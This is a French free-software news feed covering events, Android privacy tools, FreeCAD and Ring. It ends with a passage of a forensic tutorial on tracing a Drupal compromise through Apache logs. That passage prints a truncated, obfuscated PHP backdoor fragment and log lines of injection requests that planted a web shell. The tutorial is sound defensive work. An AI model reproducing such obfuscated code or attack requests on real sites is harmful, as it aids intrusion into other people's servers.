Syndiquer le contenu
Mis à jour : il y a 7 heures 48 min

Atelier Arduino le samedi 13 juin 2015 à Courbevoie

7 mai, 2015 - 12:58

Dans le cadre de ses formations bi-mensuelles, le GULL StarinuX vous convie à l'atelier : ARDUINO le samedi 13 juin de 11h à 18h30, 48 rue de Colombes 92400 Courbevoie (salle Corail) À 8 min de Saint-Lazare, direction La Défense, descendre à Courbevoie).

Précision : comme à l'accoutumée, une participation de 20€ est demandée (10€ pour les demandeurs d'emploi), cette cotisation est valable un an pour environ 14 ateliers.

Au plaisir de votre présence arduinienne le 13 juin !

Télécharger ce contenu au format Epub

Lire les commentaires

Gestion de la vie privée sur Android : CyanogenMod vs Kapuer

5 mai, 2015 - 16:01
Gestion de la vie privée sur Android : Comment se protéger ?

Les applications que nous installons sur nos smartphones demandent de plus en plus à avoir accès à nos informations privée. De base, il n'est pas possible de gérer les permissions que demandent les applications. Soit on accepte tout ce qu'elles demandent et on peut les installer, soit ça ne nous plait pas et il faut se passer de l'application.

Peu d'outils nous permettent de gérer les permissions des applications. Aujourd'hui nous allons en comparer 2 : Le Privacy Guard Manager embarqué sur la distribution CyanogenMod et Kapuer, l'application basé sur le framework Xposed.

    Sommaire Présentation de Privacy Guard Manager


    http://www.cyanogenmod.org/
    Privacy Guard Manager permet de passer outre le système d’origine d’Android et de gérer, une fois l’application installée, sa liste de permissions. Ainsi un utilisateur peut installer une application même si celle-ci contient une ou plusieurs permissions qu’il ne souhaite pas lui accorder, après l’installation, en utilisant Privacy Guard Manager, il pourra avoir accès à la liste des applications et pour chacune d’entre elle la liste des permissions.

    Si Privacy Guard Manager est très simple à utiliser, il demande aussi beaucoup de temps pour mettre en place et maintenir sa vie privée. Selon le recensement effectué par Google en 2013 (http ://think.withgoogle.com/mobileplanet/fr/), les Français ont en moyenne 32 applications installées sur leur smartphone et seulement 3 payantes. En analysant les permissions des 50 applications gratuites les plus téléchargées, on voit que chaque application demande en moyenne 11,4 permissions dont 5,72 ont un impact fort sur la vie privée. Un utilisateur doit donc gérer en moyenne 364 permissions dont 183 ont un impact direct sur sa vie privée. Avec Privacy Guard, l’utilisateur gère une par une les permissions. Donc beaucoup de temps et de réflexion en perspective.

    Un autre inconvénient apparaît en utilisant Privacy Guard : gérer les permissions hors de l’utilisation de l’application oblige l’utilisateur à se mettre dans le bon contexte pour savoir ce qu’il veut accorder ou refuser. Cet effort cognitif n’est pas facile et peut amener à des erreurs sur la gestion des permissions. Par exemple une personne ne veut pas qu’une application accède à sa localisation et supprime toutes les permissions correspondantes. Or de temps en temps, elle utilise une application GPS pour trouver des itinéraires. En ayant supprimé la permission liée à la localisation, l’application GPS ne fonctionnera pas correctement et la personne ne fera peut être pas le rapprochement entre la permission supprimée et le non-fonctionnement de l’application. Si la gestion de cette permission était intervenue pendant l’utilisation de l’application, la personne aurait compris que dans ce cas là, il fallait laisser l’accès à sa localisation et n’aurait pas eu de problèmes.

    Présentation de Kapuer


    http://kapuer.org/
    Kapuer est une application pour Android permettant tout comme Privacy Guard de gérer les permissions des applications. Mais Kapuer se distingue de Privacy Guard sur de nombreux points. Premièrement, Kapuer n'est pas un simple outil de gestion de permission. Il embarque un système de recommandations qui va apprendre vos préférences en terme de vie privée pour vous aider à vous protéger. Concrètement, à chaque fois qu'une application va vouloir accéder à une de vos données, privée, Kapuer va intercepter cette requête et va vous en informer. Vous avez alors le choix d'accepter ou de refuser que cette application ait accès à vos informations personnelles. Votre décision permet à Kapuer d'apprendre vos préférences, ce qui lui permettra plus tard, lorsqu'il aura suffisamment de connaissances sur ces préférences, de vous proposer des règles pour mieux protéger vos données personnelles.

    En utilisant Kapuer, les décisions se prennent pendant l'utilisation de l'application, elles sont donc facilitées. Et grâce à l'apprentissage des préférences et à la proposition de règles complexes, vous n'avez pas à gérer une par une toutes les permissions. Si vous n'avez pas envie de partager votre calendrier par exemple, vous allez refuser la permission sur quelques applications et Kapuer va vous proposer une règle pour refuser automatiquement que toutes les applications puissent accéder à votre calendrier.
    Bien sur Kapuer intègre un gestionnaire de permission pour pouvoir modifier ou supprimer une règle que vous avez acceptée. Par contre Kapuer étant encore en version bêta, il peut y avoir encore quelques bugs.

    La comparaison

    Privacy Guard est intégré à CyanogenMod, il est facile d'utilisation mais demande du temps et de la réflexion. De plus si vous installez une nouvelle application, il faudra penser à aller gérer ses permissions avant de l'utiliser.
    Kapuer est une application qu'il faut installer mais qui demande d'abord l'installation du framework Xposed et demande un accès root. Mais il est encore plus simple d'utilisation que Privacy Guard, s'utilise pendant l'utilisation des applications pour faciliter les décisions et les nouvelles applications sont gérées dès leur installation. En plus son côté intelligent permet de réduire le nombre de règles nécessaires pour gérer toutes les permissions.

    Pour comparer un peu plus les 2 outils, un petit test était nécessaire. Combien de "clics" sont nécessaires pour gérer les permissions de 50 applications. Les 50 applications utilisées sont les 50 applications gratuites les plus téléchargées sur Google Play Store. Il y a un total de 183 permissions liées à la vie privée à gérer. J'ai choisi de créer 10 règles pour savoir si j'allais accepter ou refuser une permission. Ces règles sont du style "Règle n°1 : J’autorise les applications de la catégorie Jeux à avoir un accès à Internet". Ainsi je sais comment configurer Privacy Guard et comment répondre aux interactions de Kapuer.

    Bilan :

    Les règles qui ont été utilisées sont :

    • Règle n°1 : J’autorise les applications de la catégorie Jeux à avoir un accès à Internet.
    • Règle n°2 : J’autorise les applications de la catégorie Social à avoir accès au réseau et aux données systèmes.
    • Règle n°3 : J’autorise les applications de la catégorie Communication à avoir accès au réseau et aux services.
    • Règle n°4 : J’autorise les applications de la catégorie Gadget à avoir accès à Internet.
    • Règle n°5 : J’autorise les applications de la catégorie Musique&Audio à avoir accès au réseau et à l’audio.
    • Règle n°6 : J’autorise les applications de la catégorie Outils à avoir accès à tout ce qu’elles demandent.
    • Règle n°7 : J’autorise les applications de la catégorie Voyages&Infos à avoir accès au réseau et au GPS.
    • Règle n°8 : J’autorise les applications de la catégorie Divertissement à avoir accès à Internet.

    On peut voir que pour chaque règle, Kapuer a besoin de moins d'interactions que Privacy Guard. Si sur certaines règles, la différence est moindre, sur la règle n°1 (qui porte sur les jeux avec 28 applications sur les 50), la différence est énorme. Ce résultat est possible avec Kapuer grâce à une règle qui a permis de gérer directement tous les jeux et donc de ne pas avoir à les gérer chacun, un à un.
    Kapuer permet donc bien de contrôler la vie privée efficacement !

    Télécharger ce contenu au format Epub

    Lire les commentaires

    Ring, la plate-forme de communication multimédia distribuée et sécurisée

    5 mai, 2015 - 10:49

    Savoir-faire Linux et l'équipe de développement de SFLphone ont le plaisir de vous annoncer la sortie en version alpha d'une nouvelle plate-forme de communication texte, voix et vidéo qui ne requiert pas de serveur central et qui laisse le contrôle et la confidentialité entre les mains des utilisateurs.

    NdM : bien que le projet soit en version alpha, il hérite de SLFPhone, développé depuis 2006

    En adoptant la technologie de la table de hachage distribuée (DHT) qui est utilisée par les réseaux de partage de fichiers comme BitTorrent, la plate-forme crée son propre réseau sécurisé sur Internet sur lequel elle distribue des fonctions d’annuaire, d’authentification et de chiffrement à tous les systèmes qui s’y connectent. C’est pourquoi elle a été appelée Ring.

    Suite en deuxième partie…

    Ring (GPLv3) est composé de trois développements distincts :

    • le Ring daemon : Dring ;
    • une bibliothèque commune pour les Clients : Libringclient ;
    • les interfaces clients pour :
      • Gnome ;
      • KDE ;
      • OS X

    Le projet est actuellement disponible pour OS X & pour les distributions Linux : des paquets pré-compilés sont publiés, et les procédures de compilation sont documentées. Le projet Ring dispose d'un wiki spécifique. Des ports pour Windows & Android sont en cours.

    Télécharger ce contenu au format Epub

    Lire les commentaires

    Revue de presse de l'April pour la semaine 18 de l'année 2015

    5 mai, 2015 - 10:25

    La revue de presse de l'April est régulièrement éditée par les membres de l'association. Elle couvre l'actualité de la presse en ligne, liée au logiciel libre. Il s'agit donc d'une sélection d'articles de presse et non de prises de position de l'association de promotion et de défense du logiciel libre.

    Sommaire

    [ITespresso] Brevets: Microsoft fait fructifier le trésor Android

    Par Clément Bohic, le jeudi 30 avril 2015. Extrait:

    Qisda (marque BenQ) rejoint la liste des fabricants qui versent des royalties à Microsoft pour vendre des terminaux sous Android ou Chrome OS.

    Lien vers l'article original: http://www.itespresso.fr/brevets-microsoft-fructifier-tresor-android-94941.html

    [Next INpact] Loi numérique: le rapport du CNNum se fait encore attendre

    Par Xavier Berne, le jeudi 30 avril 2015. Extrait:

    Alors que le gouvernement n’a de cesse de promettre que le futur projet de loi numérique d’Axelle Lemaire sera présenté en Conseil des ministres au mois de juin, le Conseil national du numérique (CNNum) ne lui a toujours pas remis son rapport, censé être le préalable à ce texte d’envergure. On fait le point.

    Lien vers l'article original: http://www.nextinpact.com/news/93969-loi-numerique-rapport-cnnum-se-fait-encore-attendre.htm

    [Next INpact] Loi Renseignement: Bernard Cazeneuve répond à la CNCDH, répondons à Bernard Cazeneuve

    Par Marc Rees, le mercredi 29 avril 2015. Extrait:

    Le 20 avril dernier, la Commission Nationale Consultative des Droits de l'Homme a publié un avis au vitriol (PDF) concernant le projet de loi sur le renseignement. La missive a peu été appréciée par le ministre de l’Intérieur, qui s’est fendu d’une note en réponse, histoire de contrecarrer ces remarques. Après avoir longuement analysé le projet de loi, nous avons décidé de reprendre les 20 remarques de la CNCDH, mises en avant par le ministre avec ses réponses, afin d’y apporter à notre tour nos commentaires.

    Lien vers l'article original: http://www.nextinpact.com/news/93947-loi-renseignement-bernard-cazeneuve-repond-a-cncdh-repondons-a-bernard-cazeneuve.htm

    Et aussi:

    [Developpez.com] L'Europe veut lutter contre la surveillance de masse

    Par Michael Guilloux, le mardi 28 avril 2015. Extrait:

    Les divulgations d’Edward Snowden, l’ex-employé de la NSA, ont alerté le monde informatique sur la nécessité de renforcer la sécurité des différentes plateformes, dont une bonne partie n’a pas résisté aux outils sophistiqués d’espionnage des agences de renseignements US et partenaires.

    Lien vers l'article original: http://www.developpez.com/actu/84501/L-Europe-veut-lutter-contre-la-surveillance-de-masse-par-le-financement-des-logiciels-open-source-cles-et-la-chasse-aux-bugs-dans-ces-outils

    [L'OBS] La France rit de se voir si open en son miroir

    Par Robin Prudent et Rémi Noyon, le lundi 27 avril 2015. Extrait:

    Notre beau pays va présider le Partenariat pour un gouvernement ouvert, noué entre 65 pays, qui promeut l’ouverture des données et des gouvernements. Mais l’a-t-il vraiment mérité?

    Lien vers l'article original: http://rue89.nouvelobs.com/2015/04/29/france-rit-voir-si-open-miroir-258878

    [L'OBS] Réparer un tracteur, une voiture? Illégal selon les constructeurs

    Par Andréa Fradin, le lundi 27 avril 2015. Extrait:

    Effet direct de l’évolution de la propriété intellectuelle aux Etats-Unis: les agriculteurs n’auraient pas le droit de réparer leurs tracteurs… sous peine d’être poursuivis pour violation du copyright.

    Lien vers l'article original: http://rue89.nouvelobs.com/2015/04/27/reparer-tracteur-voiture-les-constructeurs-estiment-cest-illegal-258871

    Télécharger ce contenu au format Epub

    Lire les commentaires

    Jeudi du libre du 7 mai 2015 : Projet de Loi relatif aux Renseignements, et maintenant ?

    5 mai, 2015 - 09:21

    Rendez-vous mensuels organisés par l'ALDIL, l'Association pour le Développement de l'Informatique Libre, le GULL Lyonnais, les jeudis du libre sont des conférences gratuites et libres d'accès ayant pour sujet le logiciel libre et ce qui gravite autour. Ce mois-ci, le sujet traité sera le Projet de Loi relatif aux Renseignements.

    Détails en seconde partie…

    La conférence

    Mardi 5 mai 2015, l'Assemblée nationale française va voter le texte du projet de loi sur la réforme des services de renseignements. Cette loi pose des questions fondamentales sur la vie privée, la séparation des pouvoirs et l'équilibre entre les citoyens et les institutions. Les associations impliquées sur ce sujet viennent vous présenter leur interprétation des implications de cette loi sur la vie quotidienne.

    Lors de cette conférence, nous aborderons les questions sur le plan règlementaire, législatif et économique en rappelant le contexte et l'historique de ces 10 dernières années. Nous discuterons également des actions en cours et des projets futurs.

    Le lieu

    La conférence a lieu à la Maison Pour Tous / Salle des Rancy :

    249 rue Vendôme - 69003 LYON (Métro Saxe Gambetta).

    Elle débutera à 19h30.

    Télécharger ce contenu au format Epub

    Lire les commentaires

    AFUP Lyon - 6 mai 2015 - Conférence sur AWS

    5 mai, 2015 - 09:21

    Le 6 mai 2015, l'antenne lyonnaise de l'AFUP (Association Française des Utilisateurs de PHP) accueillera Benoit Viguier, développeur chez Wizacha, pour nous faire un retour d’expérience sur la migration de l’ensemble de leur infrastructure vers Amazon Web Services.

    La conférence aura lieu dans les locaux d’Epitech, au 86 boulevard Marius Vivier-Merle 69003 LYON.

    Le cloud est utilisé par tous les grands du web mais il ne leur est pas réservé, nul besoin d’attendre plus tard pour déployer son application dans le nuage.

    Le principal avantage pour une petite entreprise, c’est la flexibilité. Pouvoir n’utiliser que ce dont on a besoin, tout en sachant qu’on peut rapidement passer à l’échelle si besoin.

    Voici un retour d’expérience sur un hébergement full AWS en startup: pourquoi le cloud, comment migrer pas à pas, comment passer à l’échelle, et combien ça coûte.

    La conférence aura lieu le mercredi 6 mai à 19h, dans les locaux d’Epitech, au 86 boulevard Marius Vivier-Merle 69003 LYON.

    Télécharger ce contenu au format Epub

    Lire les commentaires

    épisode de No Limit Secu dédié à l'OWASP

    5 mai, 2015 - 01:04

    No Limit Secu est un podcast (ou bala(do)diffusion) indépendant, animé par des personnes passionnées qui sont parties prenantes dans le domaine de la cybersécurité à des rôles et dans entreprises diverses.

    Le podcast est publié à fréquence hebdomadaire, sur son site web, généralement le dimanche. Une nouvelle thématique est abordée chaque semaine, en présence d'un invité lié de près ou de loin à cette thématique.

    L'épisode de cette semaine porte sur la fondation OWASP. L'invité est Sébastien Gioria, qui dirige la division française de l'OWASP.

    L’OWASP (Open Web Application Security Project) est une fondation qui gère une communauté travaillant sur la sécurité des applications web. Sa philosophie est d’être à la fois libre et ouverte à tous. Elle a pour vocation de publier des recommandations de sécurisation Web et de proposer aux internautes, administrateurs et entreprises des méthodes et outils de référence permettant de contrôler le niveau de sécurisation de ses applications Web.

    Télécharger ce contenu au format Epub

    Lire les commentaires

    Second Meetup Python à Bruxelles - vendredi 8 mai 2015

    4 mai, 2015 - 10:46

    On continue ! Suite au succès du premier Meetup déjà annoncé ici, on enchaine cette fois sur le thème précis du déploiement. Vous ne savez pas trop comment gérer vos machines virtuelles, ce qu'est SaltStack ou vous voulez au contraire partager vos bonnes (et mauvaises) expériences sur le sujet ? rejoignez-nous ce vendredi dans les locaux de Railnova au cœur de Bruxelles pour apprendre ensemble mais surtout discuter autour d'un de nos sujets favoris : Python ! 

    PS: le Meetup est bilingue francais/anglais afin d'etre le plus inclusif possible.

    Télécharger ce contenu au format Epub

    Lire les commentaires

    Sortie de FreeCAD 0.15

    4 mai, 2015 - 00:21

    La nouvelle version publiée de FreeCAD est disponible depuis le 8 avril 2015. Cette nouvelle version apporte une grande variété de nouveautés dans la plupart des ateliers, comme par exemple le support de l'Occulus Rift.
    FreeCAD est un logiciel libre et multi-plateforme de conception 3D paramétrique assisté par ordinateur.

    Les nouveautés

    L'atelier Architecture (Arch) bénéficie de nombreuses nouveautés:

    • L'import/export IFC est basé sur la plus récente bibliothèque IfcOpenShell ; il est maintenant plus rapide et rend FreeCAD compatible dans les deux sens avec le processus BIM.
    • La coupe d'un objet est possible selon un plan.
    • Le nouvel outil Toiture propose plus de contrôle sur les paramètres de chaque pan de Toit : pente, largeur, épaisseur, débord…
    • Un nouvel objet Panneaux permet de créer toutes sortes d'objets à base de panneaux.
    • Un nouvel objet Équipement permet d'ajouter toutes sortes d'objets de type sanitaire, mobilier, design d'intérieur avec des propriétés propres telles que la référence du produit, son lien, son fabricant, etc.

    L'atelier Esquisse (Sketcher) supporte désormais les Ellipses. De plus cet atelier offre des outils pour analyser et réparer les esquisses.

    L'atelier Tableur (Spreadsheet) a été entièrement recodé afin de fournir un atelier robuste de feuilles de calculs, il permet de récupérer toutes sortes d'informations à partir du modèle.

    L'atelier Mise en plan (Drawing) permet maintenant d'exporter directement les mises en plan en DXF.

    La liste complète des nouveautés est disponible dans la Notes de version 0.15

    Des ateliers/modules complémentaires :

    De nouveaux modules sont apparus, développés par des utilisateurs de FreeCAD. Ils ne sont pas intégrés directement dans la version officielle pour diverses raisons mais sont devenus très populaires par leurs fonctionnalités très attendues dans FreeCAD.
    Le module Drawing Dimensioning permet d'ajouter des cotes directement dans une page de dessin.
    Le module Assembly2 permet de créer des assemblages par ajout de contraintes.
    Le module Animation permet de créer des animations.
    La macro WorkFeature propose de nombreux outils de création de point, ligne, plan de construction pour vous aider dans la réalisation de vos modèles.

    Un PPA est en cours de création afin de faciliter l'installation (sur Ubuntu) de ces modules complémentaires.

    La suite

    Module Path : ce nouveau module devrait être intégré à FreeCAD sous peu. Cet atelier permet d'importer, éditer et générer du GCODE pour l'utilisation d'une machine CNC directement depuis un projet FreeCAD.
    L'atelier est très bien documenté sur Github (EN)

    Module Architecture : la compatibilité BIM/IFC est toujours une priorité. De plus des outils de métrés sont déjà en cours de développement.

    Module FEM (Analyse par la méthode des éléments finis) : depuis la sortie de la version 0.15 de nombreuses fonctionnalités ont été ajoutées dans cet atelier qui s’appuie sur Netgen pour réaliser le maillage et Calculix pour le calcul d'efforts.

    Module Assemblage : cet atelier est en développement depuis très longtemps mais est freiné par de nombreux aspects compliqués de la modélisation paramétrique, comme par exemple le nommage topologique (qui permet de nommer une entité d'un objet quelles que soient les modifications apportées).

    Le développement financé

    Le module PATH est le premier atelier à être développé suite à un financement participatif. Ce nouveau module a été créé par Yorik van Havre, Daniel Falck et Brad Collette. Le processus de financement étant un peu spécial Yorik expliquera la démarche sur son blog bientôt.

    Dernièrement Ian Rees a demandé à la communauté si elle était disposée à le soutenir financièrement pour son travail sur FreeCAD car il se retrouve en ce moment entre deux boulots. Son précédent emploi consistait à maintenir le télescope à neutrinos IceCube au pole Sud pendant l'hiver lorsqu'il n'y a pas d'accès par avion. Il n'est pas décidé pour son prochain emploi.
    Concernant FreeCAD il s'attarde principalement à développer le module Mise en plan (Drawing). Vous pouvez suivre son travail sur son blog (EN) et éventuellement le soutenir.

    Personnellement, en plus de proposer des services de formations, d'assistance et de développement je propose régulièrement des cours par vidéo conférence accessible à tous gratuitement en proposant aux participants de me soutenir financièrement via Tipeee. Tipeee : Formation Web FreeCAD

    L'équipe principale de développement de FreeCAD à l'exception de Yorik ne fait pas financer le développement de FreeCAD. Cependant elle est ouverte à tout type de développement financé.

    Télécharger ce contenu au format Epub

    Lire les commentaires

    Remonter une attaque et trouver la faille avec les logs d'Apache2

    4 mai, 2015 - 00:21

    Nous allons voir dans cet article comment remonter une attaque suite au piratage d'un site avec les logs d'Apache. On partira du principe que Apache est déjà configuré pour mettre ses logs dans /var/log/apache2 et dans les fichiers access.log et error.log.

    Sommaire

    La documentation d'apache explique très bien comment est formée une ligne typique d'un fichier de log, mais découpons finement la ligne suivante pour voir ce que ça signifie :

    93.184.216.34 - - [20/Apr/2015:21:54:21 +0200] "GET /2015/01/25/NSA-bullrun.html HTTP/1.1" 200 8766 "https://www.libwalk.so/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36" 0

    Pour info, ça correspond à la ligne suivante dans votre configuration apache2 :

    LogFormat "%{LOGIN}e %h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %T"

    Pour la comprendre plus facilement, on peut imaginer la lire comme un journal de bord dans lequel la personne qui s'en chargerait raconterait tout avec le plus de détails possible. Dans l'exemple ci-dessus, les logs nous racontent que :

    J'ai eu une requête provenant de l'adresse IP 93.184.216.34 le 20 avril 2014 à 21h54 et 21 secondes (+0200 indiquant la timezone de votre serveur), elle m'a demandé (GET) d'accèder à la ressource /2015/01/25/NSA-bullrun.html en utilisant le protocole HTTP/1.1.

    J'indique ensuite le statut de cette ressource (200), ainsi que sa taille (ici le nombre d'octets envoyés, y compris les en-têtes) (8766).

    Elle m'indique venir du site https://www.libwalk.so (referer) et m'affirme l'avoir fait en utilisant le logiciel Mozilla/5.0 […] (user-agent). Et j'ai mis 0 seconde à servir cette ressource.

    Navigation

    Pour comprendre comment on peut retrouver des traces d'une personne (ou d'un bot) "facilement", voici les logs que génère un visiteur en arrivant sur ce blog (j'ai passé des lignes pour que ce soit plus lisible) :

    93.184.216.34 - - [20/Apr/2015:21:53:45 +0200] "GET / HTTP/1.1" 200 2605 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36" 0 93.184.216.34 - - [20/Apr/2015:21:53:45 +0200] "GET /css/slimbox2.css HTTP/1.1" 200 536 "https://www.libwalk.so/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36" 0 93.184.216.34 - - [20/Apr/2015:21:53:45 +0200] "GET /css/bootstrap.min.css HTTP/1.1" 200 16343 "https://www.libwalk.so/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36" 0 93.184.216.34 - - [20/Apr/2015:21:53:46 +0200] "GET /css/style.css HTTP/1.1" 200 673 "https://www.libwalk.so/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36" 0

    Puis en cliquant sur le bouton "read more" de l'article "NSA - À propos de BULLRUN" :

    93.184.216.34 - - [20/Apr/2015:21:54:21 +0200] "GET /2015/01/25/NSA-bullrun.html HTTP/1.1" 200 8766 "https://www.libwalk.so/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36" 0 93.184.216.34 - - [20/Apr/2015:21:54:21 +0200] "GET /images/2014/snowden/trivial_catastrophic.png HTTP/1.1" 200 96122 "https://www.libwalk.so/2015/01/25/NSA-bullrun.html" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36" 0 93.184.216.34 - - [20/Apr/2015:21:54:21 +0200] "GET /images/2014/snowden/PGP_encrypted1.png HTTP/1.1" 200 15137 "https://www.libwalk.so/2015/01/25/NSA-bullrun.html" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36" 0 93.184.216.34 - - [20/Apr/2015:21:54:21 +0200] "GET /images/2014/snowden/OTR_encrypted1.png HTTP/1.1" 200 45057 "https://www.libwalk.so/2015/01/25/NSA-bullrun.html" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36" 0

    Dans la première partie, il arrive sur la page d'accueil du site, et il demande les feuilles de style CSS pour pouvoir afficher l'ensemble convenablement. Dans la seconde partie, on peut voir qu'il charge la page de l'article et qu'il "demande" les images d'illustrations qui vont avec.

    Codes et méthodes

    Les quelques lignes de logs que vous avez ci-dessus sont toujours sur le même modèle (même méthode HTTP, même code HTTP, …), avant de continuer, voici quelques éléments supplémentaires pour mieux comprendre la suite :

    Liste des codes HTTP, avec ceux que l'on retrouve le plus souvent) :

    Nous avons eu seulement des codes 200 dans les requêtes ci-dessus. Voici une vue rapide de ce que l'on peut avoir :

    • 1xx : message d'information, type "requête reçue, le process continue"
    • 2xx : message annonçant un succès
      • 200 : OK
    • 3xx : message annoncant une redirection
      • 307 : redirection temporaire
      • 308 : redirection permanente
    • 4xx : erreur du client
      • 401 : requête non autorisée
      • 403 : requête interdite
      • 404 : requête non trouvée
    • 5xx : erreur du serveur
      • 503 : service non disponible
    Liste des méthodes HTTP
    • GET : demande une ressource (la requête étant normalement sans effet sur celle-ci ressource)
    • POST : transmet des données en vue d'un traitement. Le résultat peut être la création de nouvelles ressources (fichiers…) ou la modification de fichiers existants.
    • HEAD : demande seulement des informations sur la ressource (sans demander la ressource elle-même)

    À noter qu'il existe d'autres méthodes (DELETE, PUT, TRACE…) mais qui apparaissent très, très rarement. Si vous vous êtes fait pirater, et que vous avez une idée du moment de l'attaque, commencez par regarder les requêtes POST ayant eu lieu à ce moment là :)

    Temps de jouer à cache-cache

    Nous allons voir ici deux exemples d'attaques différentes pour vous donner des pistes à suivre.

    Exemple 1 : Drupal

    Un attaquant a réussi à injecter du code sur un Drupal.

    En regardant les fichiers modifiés récemment du site, par exemple avec la commande find et son option -mtime(fichier dont les données ont été modifiées il y a n*24 heures). Dans cette ligne de commande, je recherche donc les fichiers php ayant été modifiés il y a moins de 2 jours.

    find . -mtime -2 -iname "*.php"

    Après un piratage, on trouve souvent des fichiers avec des lignes en plus (souvent en base64 ou avec des chaînes de caractères étranges) :

    $YLbgPfj524 = "vh46afl7tm2ik*n3pws.bu;0j)(qo_erzxy51dg9c8/";$oDJXw7301 = $YLbgPfj524[16].$YLbgPfj524[31].$YLbgPfj524[30].$YLbgPfj524[38].$YLbgPfj524[29].$YLbgPfj524[31].$YLbgPfj524[30].$YLbgPfj524[16].$YLbgPfj524[6].$YLbgPfj524[4].$YLbgPfj524[40].$YLbgPfj524[30];$Gcwa9593

    Regardons la date exacte de modification d'un des fichiers :

    ls -l sites/all/themes/wtm7973n.php -rw-rw---- 1 www-data www-data 1285 mars 28 06:03 ./sites/all/themes/wtm7973n.php

    et d'un autre :

    ls -l sites/default/db.php -rw-rw---- 1 www-data www-data 510 mars 28 06:19 ./sites/default/db.php

    Notre première piste : le 28 mars à 06h03 (c'est l'heure la plus ancienne que je trouve dans les fichiers modifiés) ; si les logs sont particulièrement verbeux, on peut affiner directement en enlevant les requêtes GET, par exemple avec grep -v "GET" access.log|less).

    Cherchons dans les logs

    On ouvre les logs avec la commande less (less access.log) puis on utilise la touche / pour lancer une recherche (par exemple 2015:06:03) pour voir les requêtes au moment de l'attaque.

    68.180.228.246 - - [28/Mar/2015:06:02:02 +0100] "GET /lidentite-0 HTTP/1.1" 200 8409 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 1 157.55.39.120 - - [28/Mar/2015:06:02:22 +0100] "GET /printmail/5732 HTTP/1.1" 200 8176 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 1 157.55.39.120 - - [28/Mar/2015:06:02:35 +0100] "GET /print/1832 HTTP/1.1" 200 4531 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 0 157.55.39.120 - - [28/Mar/2015:06:02:43 +0100] "GET /print/5041 HTTP/1.1" 200 6582 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 0 81.163.131.61 - - [28/Mar/2015:06:03:07 +0100] "POST /index.php?q=fckeditor%2Fxss HTTP/1.1" 404 29446 "-" "-" 1 81.163.131.61 - - [28/Mar/2015:06:03:09 +0100] "POST /index.php?q=ckeditor%2Fxss HTTP/1.1" 200 3 "-" "-" 0 81.163.131.61 - - [28/Mar/2015:06:03:10 +0100] "POST /index.php?q=ckeditor%2Fxss HTTP/1.1" 200 13 "-" "-" 0 81.163.131.61 - - [28/Mar/2015:06:03:11 +0100] "GET /sites/all/themes/wtm7973n.php HTTP/1.1" 200 109 "-" "-" 0 91.194.60.86 - - [28/Mar/2015:06:05:01 +0100] "GET /cron.php?cron_key=SkL5Ge7 HTTP/1.1" 200 3 "-" "Wget/1.13.4 (linux-gnu)" 10 207.46.13.9 - - [28/Mar/2015:06:05:12 +0100] "GET /print/2862 HTTP/1.1" 200 4324 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 1 148.251.68.67 - - [28/Mar/2015:06:05:18 +0100] "GET / HTTP/1.1" 200 50604 "-" "aria2/1.18.6" 1 188.165.15.98 - - [28/Mar/2015:06:05:28 +0100] "GET /concours HTTP/1.1" 200 9948 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)" 0 157.55.39.120 - - [28/Mar/2015:06:05:51 +0100] "GET /node/6164 HTTP/1.1" 200 9574 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 1 207.46.13.9 - - [28/Mar/2015:06:06:42 +0100] "GET /breves/www.news.fr HTTP/1.1" 200 9787 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 1 83.169.91.4 - - [28/Mar/2015:06:06:58 +0100] "GET / HTTP/1.1" 200 50604 "-" "Mozilla/5.0 (X11; Linux i686; rv:19.0) Gecko/20100101 Firefox/19.0" 1 81.163.131.61 - - [28/Mar/2015:06:07:06 +0100] "POST /sites/all/themes/wtm7973n.php HTTP/1.1" 200 1123 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET4.0C; .NET4.0E)" 1 81.163.131.61 - - [28/Mar/2015:06:07:08 +0100] "GET /wp-conf.php?t8449n=1 HTTP/1.1" 200 29207 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET4.0C; .NET4.0E)" 0 125.209.235.176 - - [28/Mar/2015:06:07:14 +0100] "GET /robots.txt HTTP/1.1" 200 649 "-" "Mozilla/5.0 (compatible; Yeti/1.1; +http://help.naver.com/robots/)" 0 125.209.235.179 - - [28/Mar/2015:06:07:15 +0100] "GET / HTTP/1.1" 200 10929 "-" "Mozilla/5.0 (compatible; Yeti/1.1; +http://help.naver.com/robots/)" 1

    À 6:03:07, une première tentative d'injection (POST) semble rater (code 404) :

    81.163.131.61 [28/Mar/2015:06:03:07] "POST /index.php?q=fckeditor%2Fxss 404

    Mais les deux suivantes fonctionnent (code 200) :

